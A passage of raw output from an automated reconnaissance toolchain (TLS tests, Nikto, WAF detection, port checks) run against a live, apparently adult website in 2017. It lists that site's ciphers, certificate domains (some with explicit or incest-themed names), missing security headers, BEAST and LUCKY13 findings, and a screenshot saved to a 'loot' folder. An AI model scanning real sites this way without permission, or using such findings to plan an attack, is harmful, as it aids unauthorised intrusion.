  5142.  Safari 5.1.9 OS X 10.6.8     TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5143.  Safari 7 iOS 7.1             TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5144.  Safari 9 OS X 10.11          TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5145.  Safari 10 OS X 10.12         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5146.  Apple ATS 9 iOS 9            TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5147.  Tor 17.0.9 Win 7             TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5148.  Java 6u45                    No connection
  5149.  Java 7u25                    TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5150.  Java 8u31                    TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5151.  OpenSSL 1.0.1l               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5152.  OpenSSL 1.0.2e               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5153.  
  5154.  Done 2017-12-23 02:43:44 [ 260s] -->> 104.18.36.196:443 (nnhoney.com) <<--
  5155.  
  5156. -----------------------------------------------------
  5157.  Start 2017-12-23 02:43:46        -->> 104.18.37.196:443 (nnhoney.com) <<--
  5158.  
  5159.  further IP addresses:   104.18.36.196 2400:cb00:2048:1::6812:25c4
  5160.                          2400:cb00:2048:1::6812:24c4
  5161.  rDNS (104.18.37.196):   --
  5162.  Service detected:       HTTP
  5163.  
  5164.  
  5165.  Testing protocols via sockets except SPDY+HTTP2 
  5166.  
  5167.  SSLv2      not offered (OK)
  5168.  SSLv3      not offered (OK)
  5169.  TLS 1      offered
  5170.  TLS 1.1    offered
  5171.  TLS 1.2    offered (OK)
  5172.  TLS 1.3    offered (OK): draft 18
  5173.  SPDY/NPN   h2, spdy/3.1, http/1.1 (advertised)
  5174.  HTTP2/ALPN h2, spdy/3.1, http/1.1 (offered)
  5175.  
  5176.  Testing ~standard cipher categories 
  5177.  
  5178.  NULL ciphers (no encryption)                  not offered (OK)
  5179.  Anonymous NULL Ciphers (no authentication)    not offered (OK)
  5180.  Export ciphers (w/o ADH+NULL)                 not offered (OK)
  5181.  LOW: 64 Bit + DES encryption (w/o export)     not offered (OK)
  5182.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    not offered (OK)
  5183.  Triple DES Ciphers (Medium)                   not offered (OK)
  5184.  High encryption (AES+Camellia, no AEAD)       offered (OK)
  5185.  Strong encryption (AEAD ciphers)              offered (OK)
  5186.  
  5187.  
  5188.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  5189.  
  5190.  PFS is offered (OK)          TLS13-AES-256-GCM-SHA384
  5191.                               TLS13-CHACHA20-POLY1305-SHA256
  5192.                               ECDHE-ECDSA-CHACHA20-POLY1305-OLD
  5193.                               ECDHE-ECDSA-AES256-GCM-SHA384
  5194.                               ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
  5195.                               ECDHE-ECDSA-CHACHA20-POLY1305
  5196.                               TLS13-AES-128-GCM-SHA256
  5197.                               ECDHE-ECDSA-AES128-GCM-SHA256
  5198.                               ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
  5199.  Elliptic curves offered:     secp224r1 prime256v1 secp384r1 secp521r1 X25519
  5200.  
  5201.  
  5202.  Testing server preferences 
  5203.  
  5204.  Has server cipher order?     yes (OK)
  5205.  Negotiated protocol          TLSv1.3
  5206.  Negotiated cipher            TLS13-AES-256-GCM-SHA384, 253 bit ECDH (X25519)
  5207.  Cipher order
  5208.     TLSv1:     ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  5209.     TLSv1.1:   ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
  5210.     TLSv1.2:   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
  5211.                ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
  5212.                ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
  5213.                ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
  5214.     TLSv1.3:   TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
  5215.                TLS13-AES-128-GCM-SHA256
  5216.  
  5217.  
  5218.  Testing server defaults (Server Hello) 
  5219.  
  5220.  TLS extensions (standard)    "renegotiation info/#65281" "server name/#0"
  5221.                               "session ticket/#35" "status request/#5"
  5222.                               "next protocol/#13172" "EC point formats/#11"
  5223.                               "extended master secret/#23"
  5224.                               "signed certificate timestamps/#18"
  5225.                               "application layer protocol negotiation/#16"
  5226.  Session Ticket RFC 5077 hint 64800 seconds, session tickets keys seems to be rotated < daily
  5227.  SSL Session ID support       yes
  5228.  Session Resumption           Tickets: yes, ID: yes
  5229.  TLS clock skew               -1 sec from localtime
  5230.  Signature Algorithm          ECDSA with SHA256
  5231.  Server key size              ECDSA 256 bits
  5232.  Fingerprint / Serial         SHA1 74D38F274BE92E3A35F37ED9DB2D7F1000DB2F73 / 6920BBFF258DEF4ABB52C8491D29F7E4
  5233.                               SHA256 B6B6FD5B1F8CD4B5334BBC9745638EDC3722ED3AF5B8640394D7930EE6D7ADCA
  5234.  Common Name (CN)             sni171563.cloudflaressl.com (request w/o SNI didn't succeed, usual for EC certificates)
  5235.  subjectAltName (SAN)         sni171563.cloudflaressl.com *.acreativecouple.com
  5236.                               *.agedbeauty.net *.bilalmatch.co.in
  5237.                               *.discountefhotdshop.ga *.echtgeschickt.faith
  5238.                               *.entre-coach.eu *.femdompleasures.com
  5239.                               *.fncp.asia *.fuckyeahcosplay.com
  5240.                               *.fuckyeahcurvygirls.com *.fuckyeahfitgirls.com
  5241.                               *.getsugarinstant.com *.icrc-era-humanbridge.eu
  5242.                               *.jina0mr.cf *.jnvand.in *.joyofincest.com
  5243.                               *.justsexyteengirls.com *.lilithmedia.com
  5244.                               *.m7likcmidou.gq *.nnhoney.com
  5245.                               *.pricegfsalehotbest.cf *.primetush.com
  5246.                               *.purennmodels.com *.servicecenterrijscholen.nl
  5247.                               *.survivalnation.org *.tscraze.com
  5248.                               *.wooddecor.club acreativecouple.com
  5249.                               agedbeauty.net bilalmatch.co.in
  5250.                               discountefhotdshop.ga echtgeschickt.faith
  5251.                               entre-coach.eu femdompleasures.com fncp.asia
  5252.                               fuckyeahcosplay.com fuckyeahcurvygirls.com
  5253.                               fuckyeahfitgirls.com getsugarinstant.com
  5254.                               icrc-era-humanbridge.eu jina0mr.cf jnvand.in
  5255.                               joyofincest.com justsexyteengirls.com
  5256.                               lilithmedia.com m7likcmidou.gq nnhoney.com
  5257.                               pricegfsalehotbest.cf primetush.com
  5258.                               purennmodels.com servicecenterrijscholen.nl
  5259.                               survivalnation.org tscraze.com wooddecor.club 
  5260.  Issuer                       COMODO ECC Domain Validation Secure Server CA 2 (COMODO CA Limited from GB)
  5261.  Trust (hostname)             Ok via SAN (SNI mandatory)
  5262.  Chain of trust               Ok   
  5263.  EV cert (experimental)       no
  5264.  Certificate Expiration       155 >= 60 days (2017-11-17 19:00 --> 2018-05-27 19:59 -0400)
  5265.  # of certificates provided   3
  5266.  Certificate Revocation List  http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
  5267.  OCSP URI                     http://ocsp.comodoca4.com
  5268.  OCSP stapling                offered
  5269.  OCSP must staple             no
  5270.  DNS CAA RR (experimental)    not offered
  5271.  Certificate Transparency     yes (TLS extension)
  5272.  
  5273.  
  5274.  Testing HTTP header response @ "/" 
  5275.  
  5276.  HTTP Status Code             301 Moved Permanently, redirecting to "https://www.nnhoney.com/"
  5277.  HTTP clock skew              0 sec from localtime
  5278.  Strict Transport Security    --
  5279.  Public Key Pinning           --
  5280.  Server banner                cloudflare
  5281.  Application banner           X-Powered-By(B: PHP/5(B.6(B.3(B2(B
  5282.  Cookie(s)                    2 issued: 1/2 secure, 2/2 HttpOnly -- maybe better try target URL of 30x
  5283.  Security headers             --
  5284.  Reverse Proxy banner         --
  5285.  
  5286.  
  5287.  Testing vulnerabilities 
  5288.  
  5289.  Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension
  5290.  CCS (CVE-2014-0224)                       not vulnerable (OK)
  5291.  Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK), no session tickets
  5292.  ROBOT                                     Server does not support any cipher suites that use RSA key transport
  5293.  Secure Renegotiation (CVE-2009-3555)      not vulnerable (OK)
  5294.  Secure Client-Initiated Renegotiation     not vulnerable (OK)
  5295.  CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)
  5296.  BREACH (CVE-2013-3587)                    no HTTP compression (OK)  - only supplied "/" tested
  5297.  POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)
  5298.  TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)
  5299.  SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)
  5300.  FREAK (CVE-2015-0204)                     not vulnerable (OK)
  5301.  DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)
  5302.                                            no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  5303.  LOGJAM (CVE-2015-4000), experimental      not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  5304.  BEAST (CVE-2011-3389)                     TLS1: ECDHE-ECDSA-AES128-SHA
  5305.                                                  ECDHE-ECDSA-AES256-SHA 
  5306.                                            VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  5307.  LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  5308.  RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)
  5309.  
  5310.  
  5311.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  5312.  
  5313. Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
  5314. -----------------------------------------------------------------------------------------------------------------------------
  5315.  x1302   TLS13-AES-256-GCM-SHA384          ECDH 253   AESGCM      256      TLS_AES_256_GCM_SHA384                            
  5316.  xcc14   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH 256   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD  
  5317.  xc02c   ECDHE-ECDSA-AES256-GCM-SHA384     ECDH 256   AESGCM      256      TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384            
  5318.  xc024   ECDHE-ECDSA-AES256-SHA384         ECDH 256   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384            
  5319.  xc00a   ECDHE-ECDSA-AES256-SHA            ECDH 256   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA              
  5320.  xcca9   ECDHE-ECDSA-CHACHA20-POLY1305     ECDH 253   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256      
  5321.  x1301   TLS13-AES-128-GCM-SHA256          ECDH 253   AESGCM      128      TLS_AES_128_GCM_SHA256                            
  5322.  xc02b   ECDHE-ECDSA-AES128-GCM-SHA256     ECDH 256   AESGCM      128      TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256            
  5323.  xc023   ECDHE-ECDSA-AES128-SHA256         ECDH 256   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256            
  5324.  xc009   ECDHE-ECDSA-AES128-SHA            ECDH 256   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA              
  5325.  
  5326.  
  5327.  Running client simulations via sockets 
  5328.  
  5329.  Android 2.3.7                No connection
  5330.  Android 4.1.1                TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5331.  Android 4.3                  TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5332.  Android 4.4.2                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5333.  Android 5.0.0                TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  5334.  Android 6.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, 256 bit ECDH (P-256)
  5335.  Android 7.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, 253 bit ECDH (X25519)
  5336.  Chrome 51 Win 7              TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  5337.  Chrome 57 Win 7              TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  5338.  Firefox 49 Win 7             TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5339.  Firefox 53 Win 7             TLSv1.3 TLS13-AES-128-GCM-SHA256, 253 bit ECDH (X25519)
  5340.  IE 6 XP                      No connection
  5341.  IE 7 Vista                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5342.  IE 8 XP                      No connection
  5343.  IE 8 Win 7                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5344.  IE 11 Win 7                  TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5345.  IE 11 Win 8.1                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5346.  IE 11 Win Phone 8.1 Update   TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5347.  IE 11 Win 10                 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5348.  Edge 13 Win 10               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5349.  Edge 13 Win Phone 10         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5350.  Opera 17 Win 7               TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5351.  Safari 5.1.9 OS X 10.6.8     TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5352.  Safari 7 iOS 7.1             TLSv1.2 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5353.  Safari 9 OS X 10.11          TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5354.  Safari 10 OS X 10.12         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5355.  Apple ATS 9 iOS 9            TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5356.  Tor 17.0.9 Win 7             TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5357.  Java 6u45                    No connection
  5358.  Java 7u25                    TLSv1.0 ECDHE-ECDSA-AES128-SHA, 256 bit ECDH (P-256)
  5359.  Java 8u31                    TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5360.  OpenSSL 1.0.1l               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5361.  OpenSSL 1.0.2e               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  5362.  
  5363.  Done 2017-12-23 02:48:02 [ 518s] -->> 104.18.37.196:443 (nnhoney.com) <<--
  5364.  
  5365. -----------------------------------------------------
  5366. Done testing now all IP addresses (on port 443): 104.18.36.196 104.18.37.196
  5367.  
  5368.  
  5369.  â–ˆâ–ˆâ–ˆâ–„ ▄███▓ ▄▄▄        â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   ██████  â–„â–„â–„â–„    â–ˆâ–ˆâ–“    â–“█████ ▓█████ ▓█████▄ 
  5370. ▓██▒▀█▀ ██▒▒████▄    â–’██    â–’ ▒██    â–’ ▓█████▄ ▓██▒    â–“â–ˆ   ▀ ▓█   ▀ ▒██▀ ██▌
  5371. ▓██    â–“██░▒██  â–€â–ˆâ–„  â–‘ ▓██▄   ░ ▓██▄   ▒██▒ ▄██▒██░    â–’███   ▒███   ░██   █▌
  5372. ▒██    â–’██ ░██▄▄▄▄██   ▒   ██▒  â–’   ██▒▒██░█▀  â–’██░    â–’â–“â–ˆ  â–„ ▒▓█  â–„ ░▓█▄   ▌
  5373. ▒██▒   ░██▒ ▓█   ▓██▒▒██████▒▒▒██████▒▒░▓█  â–€â–ˆâ–“░██████▒░▒████▒░▒████▒░▒████▓ 
  5374. ░ ▒░   ░  â–‘ ▒▒   ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓  â–‘â–‘â–‘ ▒░ ░░░ ▒░ ░ ▒▒▓  â–’ 
  5375. ░  â–‘      â–‘  â–’   ▒▒ ░░ ░▒  â–‘ ░░ ░▒  â–‘ ░▒░▒   ░ ░ ░ ▒  â–‘ ░ ░  â–‘ ░ ░  â–‘ ░ ▒  â–’ 
  5376. ░      â–‘     ░   ▒   ░  â–‘  â–‘  â–‘  â–‘  â–‘   ░    â–‘   ░ ░      â–‘      â–‘    â–‘ ░  â–‘ 
  5377.        â–‘         ░  â–‘      â–‘        â–‘   ░          â–‘  â–‘   ░  â–‘   ░  â–‘   ░    
  5378.                                              â–‘                        â–‘      
  5379. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  5380. + -- --=[Scan Complete!
  5381.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  5382. + -- --=[Checking if X-Content options are enabled on nnhoney.com... 
  5383.  
  5384. + -- --=[Checking if X-Frame options are enabled on nnhoney.com... 
  5385.  
  5386. + -- --=[Checking if X-XSS-Protection header is enabled on nnhoney.com... 
  5387.  
  5388. + -- --=[Checking HTTP methods on nnhoney.com... 
  5389.  
  5390. + -- --=[Checking if TRACE method is enabled on nnhoney.com... 
  5391.  
  5392. + -- --=[Checking for META tags on nnhoney.com... 
  5393.  
  5394. + -- --=[Checking for open proxy on nnhoney.com... 
  5395.  
  5396. + -- --=[Enumerating software on nnhoney.com... 
  5397. x-powered-by: PHP/5.6.32
  5398. server: cloudflare
  5399.  
  5400. + -- --=[Checking if Strict-Transport-Security is enabled on nnhoney.com... 
  5401.  
  5402. + -- --=[Checking for Flash cross-domain policy on nnhoney.com... 
  5403.  
  5404. + -- --=[Checking for Silverlight cross-domain policy on nnhoney.com... 
  5405.  
  5406. + -- --=[Checking for HTML5 cross-origin resource sharing on nnhoney.com... 
  5407.  
  5408. + -- --=[Retrieving robots.txt on nnhoney.com... 
  5409. User-agent: *
  5410. Disallow: /wp-admin/
  5411. Allow: /wp-admin/admin-ajax.php
  5412.  
  5413. + -- --=[Retrieving sitemap.xml on nnhoney.com... 
  5414.  
  5415. + -- --=[Checking cookie attributes on nnhoney.com... 
  5416. set-cookie: __cfduid=d77a52f84e6c9de8900d36152767eeaf11514015434; expires=Sun, 23-Dec-18 07:50:34 GMT; path=/; domain=.nnhoney.com; HttpOnly
  5417. set-cookie: wfvt_1470590672=5a3e0acb0dd7f; expires=Sat, 23-Dec-2017 08:20:35 GMT; Max-Age=1800; path=/; secure; httponly
  5418.  
  5419. + -- --=[Checking for ASP.NET Detailed Errors on nnhoney.com... 
  5420.  
  5421. 
  5422.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  5423. - Nikto v2.1.6
  5424. ---------------------------------------------------------------------------
  5425. + Target IP:          104.18.37.196
  5426. + Target Hostname:    nnhoney.com
  5427. + Target Port:        443
  5428. ---------------------------------------------------------------------------
  5429. + SSL Info:        Subject:  /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni171563.cloudflaressl.com
  5430.                    Ciphers:  ECDHE-ECDSA-CHACHA20-POLY1305
  5431.                    Issuer:   /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
  5432. + Start Time:         2017-12-23 02:51:19 (GMT-5)
  5433. ---------------------------------------------------------------------------
  5434. + Server: cloudflare
  5435. + Cookie __cfduid created without the secure flag
  5436. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  5437. + Uncommon header 'cf-ray' found, with contents: 3d19bc935f0399da-EWR
  5438. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  5439. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  5440. + All CGI directories 'found', use '-C none' to test none
  5441. + Hostname 'nnhoney.com' does not match certificate's names: sni171563.cloudflaressl.com
  5442. + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
  5443. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  5444. + Scan terminated:  20 error(s) and 7 item(s) reported on remote host
  5445. + End Time:           2017-12-23 03:34:40 (GMT-5) (2601 seconds)
  5446. ---------------------------------------------------------------------------
  5447. + 1 host(s) tested
  5448.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  5449. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/nnhoney.com-port443.jpg
  5450.  + -- --=[Port 445 closed... skipping.
  5451.  + -- --=[Port 512 closed... skipping.
  5452.  + -- --=[Port 513 closed... skipping.
  5453.  + -- --=[Port 514 closed... skipping.
  5454.  + -- --=[Port 623 closed... skipping.
  5455.  + -- --=[Port 624 closed... skipping.
  5456.  + -- --=[Port 1099 closed... skipping.
  5457.  + -- --=[Port 1433 closed... skipping.
  5458.  + -- --=[Port 2049 closed... skipping.
  5459.  + -- --=[Port 2121 closed... skipping.
  5460.  + -- --=[Port 3306 closed... skipping.
  5461.  + -- --=[Port 3310 closed... skipping.
  5462.  + -- --=[Port 3128 closed... skipping.
  5463.  + -- --=[Port 3389 closed... skipping.
  5464.  + -- --=[Port 3632 closed... skipping.
  5465.  + -- --=[Port 4443 closed... skipping.
  5466.  + -- --=[Port 5432 closed... skipping.
  5467.  + -- --=[Port 5800 closed... skipping.
  5468.  + -- --=[Port 5900 closed... skipping.
  5469.  + -- --=[Port 5984 closed... skipping.
  5470.  + -- --=[Port 6000 closed... skipping.
  5471.  + -- --=[Port 6667 closed... skipping.
  5472.  + -- --=[Port 8000 closed... skipping.
  5473.  + -- --=[Port 8100 closed... skipping.
  5474.  + -- --=[Port 8080 opened... running tests...
  5475.  
  5476.                                  ^     ^
  5477.         _   __  _   ____ _   __  _    _   ____
  5478.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  5479.       | V V // o // _/ | V V // 0 // 0 // _/
  5480.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  5481.                                 <
  5482.                                  ...'
  5483.  
  5484.     WAFW00F - Web Application Firewall Detection Tool
  5485.  
  5486.     By Sandro Gauci && Wendel G. Henrique
  5487.  
  5488. Checking http://nnhoney.com:8080
  5489. The site http://nnhoney.com:8080 is behind a CloudFlare
  5490. Number of requests: 1
  5491.  
  5492. http://nnhoney.com:8080 [521 Unassigned] CloudFlare, Cookies[__cfduid,cf_ob_info,cf_use_ob], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.18.37.196], JQuery, Script[text/javascript], Title[nnhoney.com | 521: Web server is down], UncommonHeaders[cf-ray], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=Edge]
  5493.  
  5494.  
  5495.    __  ______ _____ 
  5496.    \ \/ / ___|_   _|
  5497.     \  /\___ \ | |  
  5498.     /  \ ___) || |  
  5499.    /_/\_|____/ |_|  
  5500.  
  5501. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  5502. + -- --=[Target: nnhoney.com:8080
  5503. + -- --=[Site not vulnerable to Cross-Site Tracing!
  5504. + -- --=[Site not vulnerable to Host Header Injection!
  5505. + -- --=[Site not vulnerable to Cross-Frame Scripting!
  5506. + -- --=[Site not vulnerable to Clickjacking!
  5507.  
  5508. HTTP/1.1 405 Not Allowed
  5509. Date: Sat, 23 Dec 2017 08:35:53 GMT
  5510. Content-Type: text/html
  5511. Content-Length: 177
  5512. Connection: close
  5513. Server: cloudflare-nginx
  5514. CF-RAY: -
  5515.  
  5516. <html>
  5517. <head><title>405 Not Allowed</title></head>
  5518. <body bgcolor="white">
  5519. <center><h1>405 Not Allowed</h1></center>
  5520. <hr><center>cloudflare-nginx</center>
  5521. </body>
  5522. </html>
  5523. 
  5524. HTTP/1.1 521 Origin Down
  5525. Date: Sat, 23 Dec 2017 08:36:10 GMT
  5526. Content-Type: text/html; charset=UTF-8
  5527. Transfer-Encoding: chunked
  5528. Connection: keep-alive
  5529. Set-Cookie: __cfduid=d4af1353b2e0ac7c1e0a4c0ba0c9ee4081514018169; expires=Sun, 23-Dec-18 08:36:09 GMT; path=/; domain=.nnhoney.com; HttpOnly
  5530. Expires: Thu, 01 Jan 1970 00:00:01 GMT
  5531. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  5532. Pragma: no-cache
  5533. X-Frame-Options: SAMEORIGIN
  5534. Set-Cookie: cf_use_ob=8080; expires=Sat, 23-Dec-17 08:36:40 GMT; path=/
  5535. Set-Cookie: cf_ob_info=521:3d19fdd9305e1491:AMS; expires=Sat, 23-Dec-17 08:36:40 GMT; path=/
  5536. Server: cloudflare
  5537. CF-RAY: 3d19fdd9305e1491-AMS
  5538.  
  5539. 1554
  5540. <!DOCTYPE html>
  5541. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  5542. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  5543. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  5544. <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
  5545. <head>
  5546. <meta http-equ
  5547.  
  5548.  
  5549. Version: 1.11.10-static
  5550. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  5551. 
  5552. Testing SSL server nnhoney.com on port 8080 using SNI name nnhoney.com
  5553.  
  5554.   TLS Fallback SCSV:
  5555. Server does not support TLS Fallback SCSV
  5556.  
  5557.   TLS renegotiation:
  5558. Session renegotiation not supported
  5559.  
  5560.   TLS Compression:
  5561. Compression disabled
  5562.  
  5563.   Heartbleed:
  5564. TLS 1.2 not vulnerable to heartbleed
  5565. TLS 1.1 not vulnerable to heartbleed
  5566. TLS 1.0 not vulnerable to heartbleed
  5567.  
  5568.   Supported Server Cipher(s):
  5569.  â–ˆâ–ˆâ–ˆâ–„ ▄███▓ ▄▄▄        â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   ██████  â–„â–„â–„â–„    â–ˆâ–ˆâ–“    â–“█████ ▓█████ ▓█████▄ 
  5570. ▓██▒▀█▀ ██▒▒████▄    â–’██    â–’ ▒██    â–’ ▓█████▄ ▓██▒    â–“â–ˆ   ▀ ▓█   ▀ ▒██▀ ██▌
  5571. ▓██    â–“██░▒██  â–€â–ˆâ–„  â–‘ ▓██▄   ░ ▓██▄   ▒██▒ ▄██▒██░    â–’███   ▒███   ░██   █▌
  5572. ▒██    â–’██ ░██▄▄▄▄██   ▒   ██▒  â–’   ██▒▒██░█▀  â–’██░    â–’â–“â–ˆ  â–„ ▒▓█  â–„ ░▓█▄   ▌
  5573. ▒██▒   ░██▒ ▓█   ▓██▒▒██████▒▒▒██████▒▒░▓█  â–€â–ˆâ–“░██████▒░▒████▒░▒████▒░▒████▓ 
  5574. ░ ▒░   ░  â–‘ ▒▒   ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓  â–‘â–‘â–‘ ▒░ ░░░ ▒░ ░ ▒▒▓  â–’ 
  5575. ░  â–‘      â–‘  â–’   ▒▒ ░░ ░▒  â–‘ ░░ ░▒  â–‘ ░▒░▒   ░ ░ ░ ▒  â–‘ ░ ░  â–‘ ░ ░  â–‘ ░ ▒  â–’ 
  5576. ░      â–‘     ░   ▒   ░  â–‘  â–‘  â–‘  â–‘  â–‘   ░    â–‘   ░ ░      â–‘      â–‘    â–‘ ░  â–‘ 
  5577.        â–‘         ░  â–‘      â–‘        â–‘   ░          â–‘  â–‘   ░  â–‘   ░  â–‘   ░    
  5578.                                              â–‘                        â–‘      
  5579. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  5580. + -- --=[Scan Complete!
  5581. - Nikto v2.1.6
  5582. ---------------------------------------------------------------------------
  5583. + Target IP:          104.18.36.196
  5584. + Target Hostname:    nnhoney.com
  5585. + Target Port:        8080
  5586. + Start Time:         2017-12-23 03:36:59 (GMT-5)
  5587. ---------------------------------------------------------------------------
  5588. + Server: cloudflare
  5589. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  5590. + Uncommon header 'cf-ray' found, with contents: 3d19ff1465a79c35-AMS
